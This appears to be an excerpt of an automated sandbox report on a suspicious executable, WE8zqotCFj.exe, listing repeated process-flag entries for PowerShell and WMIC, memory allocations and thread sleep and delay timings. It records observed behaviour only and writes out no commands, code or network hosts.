Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Memory allocated: 23284D40000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Memory allocated: 2329EA20000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598513	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597966	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597278	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597169	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597061	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596950	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596624	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Window / User API: threadDelayed 4435	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Window / User API: threadDelayed 5298	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5892	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3901	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2631	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1081	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4350	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1074	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3702	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1954	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 907

Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99628s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -598513s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597966s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597278s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597169s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -597061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -596950s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe TID: 7984	Thread sleep time: -596624s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep count: 5892 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep count: 3901 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316	Thread sleep count: 2631 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3480	Thread sleep count: 1081 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6256	Thread sleep count: 4350 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844	Thread sleep count: 1074 > 30	Jump to behavior
